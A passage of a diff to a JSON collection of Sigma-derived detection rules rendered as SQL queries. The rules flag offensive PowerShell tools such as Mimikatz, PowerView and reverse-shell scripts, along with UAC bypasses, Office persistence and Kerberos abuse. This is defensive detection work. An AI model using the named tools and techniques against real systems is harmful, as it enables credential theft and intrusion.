'%\\\\Get-SecurityPackages.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ServiceFilePermission.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ServicePermission.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ServiceUnquoted.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-SiteListPassword.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-System.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-TimedScreenshot.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-UnattendedInstallFile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-Unconstrained.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-USBKeystrokes.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-VaultCredential.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-VulnAutoRun.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-VulnSchTask.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-WebConfig.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-WebCredentials.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-WLAN-Keys.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Gupt-Backdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\HTTP-Backdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\HTTP-Login.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Install-ServiceBinary.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Install-SSP.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ACLScanner.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ADSBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-AmsiBypass.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ARPScan.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BackdoorLNK.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BadPotato.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BetterSafetyKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BruteForce.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BypassUAC.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Carbuncle.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Certify.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ConPtyShell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-CredentialInjection.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-CredentialsPhish.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DAFT.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DCSync.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Decode.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DinvokeKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DllInjection.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DNSUpdate.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DowngradeAccount.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-EgressCheck.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Encode.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-EventViewer.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Eyewitness.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-FakeLogonScreen.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Farmer.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Get-RBCD-Threaded.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Gopher.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Grouper2.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Grouper3.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-HandleKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Interceptor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Internalmonologue.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Inveigh.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-InveighRelay.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-JSRatRegsvr.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-JSRatRundll.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-KrbRelay.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-KrbRelayUp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-LdapSignCheck.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Lockless.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-MalSCCM.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Mimikatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-MimikatzWDigestDowngrade.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Mimikittenz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-MITM6.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NanoDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NetRipper.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NetworkRelay.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NinjaCopy.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-OxidResolver.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-P0wnedshell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-P0wnedshellx86.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Paranoia.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PortScan.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PoshRatHttp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PoshRatHttps.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PostExfil.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellIcmp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellTCP.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellTcpOneLine.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellTcpOneLineBind.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellUdp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellUdpOneLine.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellWMI.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerThIEf.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PPLDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Prasadhak.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsExec.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsGcat.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsGcatAgent.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PSInject.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsUaCme.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ReflectivePEInjection.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ReverseDNSLookup.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Rubeus.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-RunAs.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SafetyKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SauronEye.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SCShell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Seatbelt.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ServiceAbuse.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SessionGopher.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ShellCode.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SMBScanner.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Snaffler.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Spoolsample.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SSHCommand.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SSIDExfil.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-StandIn.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-StickyNotesExtract.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Tater.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Thunderfox.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ThunderStruck.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-TokenManipulation.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Tokenvator.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-TotalExec.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-UrbanBishop.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-UserHunter.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-VoiceTroll.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Whisker.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WinEnum.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-winPEAS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WireTap.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WmiCommand.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WScriptBypassUAC.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Zerologon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Keylogger.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\MailRaider.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\New-HoneyHash.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\OfficeMemScraper.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Offline\\_Winpwn.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-CHM.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-DnsTxt.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Excel.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-HTA.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Java.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-JS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Minidump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-RundllCommand.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-SCF.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-SCT.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Shortcut.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-WebQuery.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Word.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Parse\\_Keys.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Port-Scan.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerBreach.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\powercat.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Powermad.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerRunAsSystem.psm1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerSharpPack.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerUp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerUpSQL.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerView.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PSAsyncShell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\RemoteHashRetrieval.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Remove-Persistence.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Remove-PoshRat.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Remove-Update.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Run-EXEonRemote.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Schtasks-Backdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-DCShadowPermissions.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-MacAttribute.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-RemotePSRemoting.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-RemoteWMI.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-Wallpaper.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Show-TargetScreen.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Speak.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Start-CaptureServer.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Start-WebcamRecorder.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\StringToBase64.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\TexttoExe.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\VolumeShadowCopyTools.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WinPwn.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WSUSpendu.ps1' ESCAPE '\\') OR (TargetFilename LIKE '%Invoke-Sharp%' ESCAPE '\\' AND TargetFilename LIKE '%.ps1' ESCAPE '\\')))" ], - "filename": "win_security_exploit_cve_2021_1675_printspooler_security.yml" + "filename": "file_event_win_powershell_exploit_scripts.yml" }, { - "title": "Invoke-Obfuscation VAR+ Launcher - Security", - "id": "dcf2db1f-f091-425b-a821-c05875b8925a", - "status": "experimental", - "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "title": "Octopus Scanner Malware", + "id": "805c55d9-31e6-4846-9878-c34c75054fe9", + "status": "test", + "description": "Detects Octopus Scanner Malware.", + "author": "NVISO", + "tags": [ + "attack.t1195", + "attack.t1195.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%\"set%' ESCAPE '\\' AND ServiceFileName LIKE '%-f%' ESCAPE '\\' AND (ServiceFileName LIKE '%/c%' ESCAPE '\\' OR ServiceFileName LIKE '%/r%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Cache134.dat' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\ExplorerSync.db' ESCAPE '\\'))" ], - "filename": "win_security_invoke_obfuscation_var_services_security.yml" + "filename": "file_event_win_mal_octopus_scanner.yml" }, { - "title": "Service Installed By Unusual Client - Security", - "id": "c4e92a97-a9ff-4392-9d2d-7a4c642768ca", + "title": "Potential RipZip Attack on Startup Folder", + "id": "a6976974-ea6f-4e97-818e-ea08625c52cb", "status": "experimental", - "description": "Detects a service installed by a client which has PID 0 or whose parent has PID 0", - "author": "Tim Rauch", + "description": "Detects a phishing attack which expands a ZIP file containing a malicious shortcut.\nIf the victim expands the ZIP file via the explorer process, then the explorer process expands the malicious ZIP file and drops a malicious shortcut redirected to a backdoor into the Startup folder.\nAdditionally, the file name of the malicious shortcut in Startup folder contains {0AFACED1-E828-11D1-9187-B532F1E9575D} meaning the folder shortcut operation.\n", + "author": "Greg (rule)", "tags": [ - "attack.privilege_escalation", - "attack.t1543" + "attack.persistence", + "attack.t1547" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ClientProcessId = '0' OR ParentProcessId = '0'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup%' ESCAPE '\\' AND TargetFilename LIKE '%.lnk.{0AFACED1-E828-11D1-9187-B532F1E9575D}%' ESCAPE '\\' AND Image LIKE '%\\\\explorer.exe' ESCAPE '\\')" ], - "filename": "win_security_service_installation_by_unusal_client.yml" + "filename": "file_event_win_ripzip_attack.yml" }, { - "title": "SAM Registry Hive Handle Request", - "id": "f8748f2c-89dc-4d95-afb0-5a2dfdbad332", + "title": "Potential Persistence Via Microsoft Office Add-In", + "id": "8e1cb247-6cf6-42fa-b440-3f27d57e9936", "status": "test", - "description": "Detects handles requested to SAM registry hive", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects potential persistence activity via startup add-ins that load when Microsoft Office starts (.wll/.xll are simply .dll fit for Word or Excel).", + "author": "NVISO", "tags": [ - "attack.discovery", - "attack.t1012", - "attack.credential_access", - "attack.t1552.002" + "attack.persistence", + "attack.t1137.006" ], "falsepositives": [ - "Unknown" + "Legitimate add-ins" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4656' AND ObjectType = 'Key' AND ObjectName LIKE '%\\\\SAM' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\Microsoft\\\\Word\\\\Startup\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.wll' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\Microsoft\\\\Excel\\\\Startup\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.xll' ESCAPE '\\') OR (TargetFilename LIKE '%Microsoft\\\\Excel\\\\XLSTART\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.xlam' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\Microsoft\\\\Addins\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.xlam' ESCAPE '\\' OR TargetFilename LIKE '%.xla' ESCAPE '\\' OR TargetFilename LIKE '%.ppam' ESCAPE '\\'))))" ], - "filename": "win_security_sam_registry_hive_handle_request.yml" + "filename": "file_event_win_office_addin_persistence.yml" }, { - "title": "DCOM InternetExplorer.Application Iertutil DLL Hijack - Security", - "id": "c39f0c81-7348-4965-ab27-2fde35a1b641", + "title": "UAC Bypass Using Windows Media Player - File", + "id": "68578b43-65df-4f81-9a9b-92f32711a951", "status": "test", - "description": "Detects a threat actor creating a file named `iertutil.dll` in the `C:\\Program Files\\Internet Explorer\\` directory over the network for a DCOM InternetExplorer DLL Hijack scenario.", - "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", + "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1021.003" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND RelativeTargetName LIKE '%\\\\Internet Explorer\\\\iertutil.dll' ESCAPE '\\') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\OskSupport.dll' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\system32\\\\DllHost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files\\\\Windows Media Player\\\\osk.exe' ESCAPE '\\')))" ], - "filename": "win_security_dcom_iertutil_dll_hijack.yml" + "filename": "file_event_win_uac_bypass_wmp.yml" }, { - "title": "Kerberos Manipulation", - "id": "f7644214-0eb0-4ace-9455-331ec4c09253", - "status": "test", - "description": "This method triggers on rare Kerberos Failure Codes caused by manipulations of Kerberos messages", - "author": "Florian Roth (Nextron Systems)", + "title": "Office Template Creation", + "id": "0e20c89d-2264-44ae-8238-aeeaba609ece", + "status": "experimental", + "description": "Detects creation of template files for Microsoft Office from outside Office", + "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1212" + "attack.persistence", + "attack.t1137" ], "falsepositives": [ - "Faulty legacy applications" + "Loading a user environment from a backup or a domain controller", + "Synchronization of templates" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('675', '4768', '4769', '4771') AND FailureCode IN ('0x9', '0xA', '0xB', '0xF', '0x10', '0x11', '0x13', '0x14', '0x1A', '0x1F', '0x21', '0x22', '0x23', '0x24', '0x26', '0x27', '0x28', '0x29', '0x2C', '0x2D', '0x2E', '0x2F', '0x31', '0x32', '0x3E', '0x3F', '0x40', '0x41', '0x43', '0x44'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((TargetFilename LIKE '%.dot' ESCAPE '\\' OR TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename LIKE '%.doc' ESCAPE '\\' OR TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.docx' ESCAPE '\\' OR TargetFilename LIKE '%.rtf' ESCAPE '\\') AND TargetFilename LIKE '%\\\\Microsoft\\\\Word\\\\Startup%' ESCAPE '\\') OR ((TargetFilename LIKE '%.xlt' ESCAPE '\\' OR TargetFilename LIKE '%.xltm' ESCAPE '\\' OR TargetFilename LIKE '%.xls' ESCAPE '\\' OR TargetFilename LIKE '%.xlsm' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx' ESCAPE '\\') AND TargetFilename LIKE '%\\\\Microsoft\\\\Excel\\\\Startup%' ESCAPE '\\')) AND NOT ((Image LIKE '%\\\\WINWORD.exe' ESCAPE '\\' OR Image LIKE '%\\\\EXCEL.exe' ESCAPE '\\')))" ], - "filename": "win_security_susp_kerberos_manipulation.yml" + "filename": "file_event_win_word_template_creation.yml" }, { - "title": "Invoke-Obfuscation Via Use MSHTA - Security", - "id": "9b8d9203-4e0f-4cd9-bb06-4cc4ea6d0e9a", - "status": "experimental", - "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "Mimikatz Kirbi File Creation", + "id": "9e099d99-44c2-42b6-a6d8-54c3545cab29", + "status": "test", + "description": "Detects the creation of files created by mimikatz such as \".kirbi\", \"mimilsa.log\", etc.", + "author": "Florian Roth (Nextron Systems), David ANDRE", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1558" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%mshta%' ESCAPE '\\' AND ServiceFileName LIKE '%vbscript:createobject%' ESCAPE '\\' AND ServiceFileName LIKE '%.run%' ESCAPE '\\' AND ServiceFileName LIKE '%window.close%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%.kirbi' ESCAPE '\\' OR TargetFilename LIKE '%mimilsa.log' ESCAPE '\\'))" ], - "filename": "win_security_invoke_obfuscation_via_use_mshta_services_security.yml" + "filename": "file_event_win_hktl_mimikatz_files.yml" }, { - "title": "PetitPotam Suspicious Kerberos TGT Request", - "id": "6a53d871-682d-40b6-83e0-b7c1a6c4e3a5", + "title": "Legitimate Application Dropped Executable", + "id": "f0540f7e-2db3-4432-b9e0-3965486744bc", "status": "experimental", - "description": "Detect suspicious Kerberos TGT requests.\nOnce an attacer obtains a computer certificate by abusing Active Directory Certificate Services in combination with PetitPotam, the next step would be to leverage the certificate for malicious purposes.\nOne way of doing this is to request a Kerberos Ticket Granting Ticket using a tool like Rubeus.\nThis request will generate a 4768 event with some unusual fields depending on the environment.\nThis analytic will require tuning, we recommend filtering Account_Name to the Domain Controller computer accounts.\n", - "author": "Mauricio Velazco, Michael Haag", + "description": "Detects programs on a Windows system that should not write executables to disk", + "author": "frack113, Florian Roth", "tags": [ - "attack.credential_access", - "attack.t1187" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "False positives are possible if the environment is using certificates for authentication. We recommend filtering Account_Name to the Domain Controller computer accounts." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4768' AND TargetUserName LIKE '%$' ESCAPE '\\' AND CertThumbprint LIKE '%' ESCAPE '\\') AND NOT ((IpAddress = '::1') OR (CertThumbprint = '')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR Image LIKE '%\\\\visio.exe' ESCAPE '\\' OR Image LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR Image LIKE '%\\\\wordview.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR Image LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR Image LIKE '%\\\\Desktopimgdownldr.exe' ESCAPE '\\' OR Image LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR Image LIKE '%\\\\finger.exe' ESCAPE '\\' OR Image LIKE '%\\\\notepad.exe' ESCAPE '\\' OR Image LIKE '%\\\\AcroRd32.exe' ESCAPE '\\' OR Image LIKE '%\\\\RdrCEF.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.ocx' ESCAPE '\\'))" ], - "filename": "win_security_petitpotam_susp_tgt_request.yml" + "filename": "file_event_win_legitimate_app_dropping_exe.yml" }, { - "title": "Important Scheduled Task Deleted/Disabled", - "id": "7595ba94-cf3b-4471-aa03-4f6baa9e5fad", - "status": "experimental", - "description": "Detects when adversaries stop services or processes by deleting or disabling their respective scheduled tasks in order to conduct data destructive activities", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "UAC Bypass Abusing Winsat Path Parsing - File", + "id": "155dbf56-e0a4-4dd0-8905-8a98705045e8", + "status": "test", + "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.execution", + "attack.defense_evasion", "attack.privilege_escalation", - "attack.persistence", - "attack.t1053.005" + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4699', '4701') AND (TaskName LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR TaskName LIKE 